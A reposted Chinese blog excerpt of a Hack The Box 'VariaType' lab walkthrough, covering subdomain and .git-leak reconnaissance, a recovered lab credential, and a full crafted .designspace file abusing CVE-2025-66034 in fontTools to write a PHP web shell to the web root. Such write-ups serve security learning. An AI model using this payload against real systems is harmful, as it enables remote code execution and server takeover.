渗透测试HTB Season10 VariaType全过程wp如何详细记录?

网建2026-03-30 07:532阅读
摘要:VariaType 信息收集 进行子域名枚举得到 portal portal.variatype.htb 扫描一下这个子域名的目录 可以看到git泄露 使用githack gitbotG1tB0t_Acc3ss_2025! 漏洞利用(CV
VariaType 信息收集 进行子域名枚举得到 portal portal.variatype.htb 扫描一下这个子域名的目录 可以看到git泄露 使用githack gitbot/G1tB0t_Acc3ss_2025! 漏洞利用(CVE-2025-66034) 我们在本地写一个exp.designspace <?xml version='1.0' encoding='UTF-8'?> <designspace format="5.0"> <axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"> <labelname xml:lang="en"><![CDATA[<?php system($_GET["cmd"]); ?>]]]]><![CDATA[>]]></labelname> <labelname xml:lang="fr">Regular</labelname> </axis> </axes> <sources> <source filename="source-light.ttf" name="Light"> <location><dimension name="Weight" xvalue="100"/></location> </source> <source filename="source-regular.ttf" name="Regular"> <location><dimension name="Weight" xvalue="400"/></location> </source> </sources> <variable-fonts> <variable-font name="MyFont" filename="/var/www/portal.variatype.htb/public/files/shell.php"> <axis-subsets> <axis-subset name="Weight"/> </axis-subsets> </variable-font> </variable-fonts> </designspace> 也可以使用脚本 symphony2colour/varlib-cve-2025-66034:fontTools 可变字体生成流水线中针对 CVE-2025-66034 的概念验证漏洞。精心设计的 .designspace 文件允许控制输出路径,从而实现任意文件写入。该脚本自动化了有效载荷的创建、字体生成和上传,以演示这个问题。
阅读全文
标签:

相关推荐